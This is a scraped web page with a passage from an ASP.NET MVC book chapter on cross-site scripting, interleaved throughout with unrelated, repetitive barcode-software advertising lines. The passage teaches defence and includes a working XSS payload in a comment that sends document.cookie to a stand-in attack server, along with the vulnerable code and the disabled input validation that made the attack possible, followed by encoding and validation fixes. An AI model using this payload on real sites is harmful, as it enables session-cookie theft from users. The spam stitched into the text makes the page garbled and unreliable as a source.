zxing.net code 128 Setting an insecure cookie with secret data in Visual Studio .NET

Draw Code 128A in Visual Studio .NET Setting an insecure cookie with secret data

Listing 11.5 Setting an insecure cookie with secret data
Code128 Creator In .NET
Using Barcode creator for ASP.NET Control to generate, create Code 128 Code Set C image in ASP.NET applications.
www.OnBarcode.com
Paint Linear Barcode In .NET
Using Barcode maker for ASP.NET Control to generate, create 1D image in ASP.NET applications.
www.OnBarcode.com
public ActionResult Index() { var cookie = new HttpCookie("mvcinaction", "secret"); Response.SetCookie(cookie); return View(); }
ECC200 Generator In Visual Studio .NET
Using Barcode generator for ASP.NET Control to generate, create ECC200 image in ASP.NET applications.
www.OnBarcode.com
Drawing Barcode In Visual Studio .NET
Using Barcode creator for ASP.NET Control to generate, create Barcode image in ASP.NET applications.
www.OnBarcode.com
With the cookie created, we can play the part of the hacker on the comments page, as shown in figure 11.1.
UPC - 13 Creation In .NET
Using Barcode generator for ASP.NET Control to generate, create EAN-13 Supplement 5 image in ASP.NET applications.
www.OnBarcode.com
Making UPC-A Supplement 5 In .NET
Using Barcode creation for ASP.NET Control to generate, create GS1 - 12 image in ASP.NET applications.
www.OnBarcode.com
Security
QR Code JIS X 0510 Generator In .NET
Using Barcode printer for ASP.NET Control to generate, create QR Code image in ASP.NET applications.
www.OnBarcode.com
Print Code 93 Extended In Visual Studio .NET
Using Barcode creation for ASP.NET Control to generate, create Code 93 image in ASP.NET applications.
www.OnBarcode.com
The comments page
Code 128A Printer In None
Using Barcode creation for Software Control to generate, create ANSI/AIM Code 128 image in Software applications.
www.OnBarcode.com
Creating Code 128 Code Set C In Java
Using Barcode printer for Java Control to generate, create Code 128 Code Set A image in Java applications.
www.OnBarcode.com
We included a button that will automatically insert a malicious comment in the Comment text area. The comment appears in listing 11.6.
UPC-A Reader In Visual C#.NET
Using Barcode decoder for VS .NET Control to read, scan read, scan image in .NET applications.
www.OnBarcode.com
DataMatrix Generator In None
Using Barcode generation for Software Control to generate, create Data Matrix 2d barcode image in Software applications.
www.OnBarcode.com
Listing 11.6 A malicious comment
Code 128 Decoder In VS .NET
Using Barcode reader for .NET framework Control to read, scan read, scan image in Visual Studio .NET applications.
www.OnBarcode.com
Creating Barcode In None
Using Barcode generation for Software Control to generate, create Barcode image in Software applications.
www.OnBarcode.com
A long comment <script>document.write('<img src=http://localhost:8082/attack/register input=' +escape(document.cookie)+ '/>')</script>
PDF-417 2d Barcode Scanner In VS .NET
Using Barcode recognizer for .NET Control to read, scan read, scan image in VS .NET applications.
www.OnBarcode.com
Barcode Scanner In None
Using Barcode recognizer for Software Control to read, scan read, scan image in Software applications.
www.OnBarcode.com
This comment includes a script block that writes HTML to the browser. The HTML contains an image whose SRC attribute B isn t an image at all, but the browser doesn t know that. The browser sends a request to the attacking server with the cookie in the query string. After we save the comment, the script is executed on the subsequent page where the comment is displayed, as shown in figure 11.2. We can t see anything strange here, but the nefarious script is in the HTML source, and the relevant section is shown in listing 11.7.
PDF-417 2d Barcode Creation In Java
Using Barcode generation for Java Control to generate, create PDF-417 2d barcode image in Java applications.
www.OnBarcode.com
Read Barcode In .NET
Using Barcode reader for .NET framework Control to read, scan read, scan image in VS .NET applications.
www.OnBarcode.com
Cross-site scripting (XSS)
Barcode Encoder In Java
Using Barcode creation for BIRT Control to generate, create Barcode image in Eclipse BIRT applications.
www.OnBarcode.com
Drawing Data Matrix 2d Barcode In Objective-C
Using Barcode generator for iPhone Control to generate, create Data Matrix 2d barcode image in iPhone applications.
www.OnBarcode.com
The comment unbeknownst to the visitor, a nasty script is executed.
Listing 11.7 Nefarious script in HTML
<p>Comment:</p> <p> A long comment <script>document.write( '<img src=http://localhost:8082/attack/ register input=' +escape(document.cookie) + '/>')</script> </p>
Of course, the browser dutifully responds to this script and sends the cookie to the attacking site. When we reload the attacking site, we can see that our attack has been executed, as shown in figure 11.3. The other site received our cookie.
Hacking success the cookie has been sent to the attacking site.
Security
Now that we ve had a chance to see XSS in action, let s work on securing our application against that vulnerability.
11.2.2 Avoiding XSS vulnerabilities
Never trust input. Never, ever, ever expect input to be safe. Whether it s from a human user or a machine, dangerous input is the root attack vector involved in XSS attacks. We don t trust it coming in, and we certainly don t trust it when we render it. That s the key.
ENCODE EVERYTHING
One vulnerability in our example application is that it rendered the submitted script as script to be executed by the browser (as shown in figure 11.2). Instead, we should have HTML-encoded the comment. HTML encoding transforms text from HTML that s interpreted by the browser into symbols that the browser will render without interpretation. Instead of our script being parsed and executed, it would ve simply been displayed as text. In our view, we rendered the comment with this markup: <%= Model.Comment %>, but we could ve applied a built-in function that encodes HTML: <%= Html.Encode(Model.Comment) %>. Figure 11.4 shows how a harmless HTML-encoded script would appear.
Our script rendered harmlessly.
Cross-site scripting (XSS)
HTML-encoding code blocks in ASP.NET 4
There s a new feature in ASP.NET 4 that allows developers to conveniently express HTML-encoded output without using the Html.Encode helper function. Instead of specifying output with <%= "text" %>, we can use <%: "text" %>. For more information, refer to Phil Haack s blog post, HTML Encoding Code Blocks with ASP.NET 4 (http://mng.bz/Z3V5). Although HTML encoding all output makes our application much more secure, hackers are crafty and are constantly discovering new ways to evade encoding. It s important to also check input to our application.
ASP.NET MVC DEFAULTS
To craft the vulnerable example, we had to disable protective features in ASP.NET MVC 2. Listing 11.8 demonstrates how input validation was specifically disabled.
Listing 11.8 Disabling input validation
[ValidateInput(false)] public ViewResult Save(CommentInput form) { return View(form); }
When set to false, the ValidateInput attribute signals ASP.NET to not validate user input to this action. Without this attribute, validation will happen by default, checking the query string, form, and cookies for a list of malicious content. Without this attribute directing ASP.NET to not validate, users submitting unsafe input will see the exception in figure 11.5. Input validation can prevent safe input if the application is expecting HTML or other markup. It should be disabled with extreme caution, and you should redouble your efforts to HTML-encode all output.
Copyright © OnBarcode.com . All rights reserved.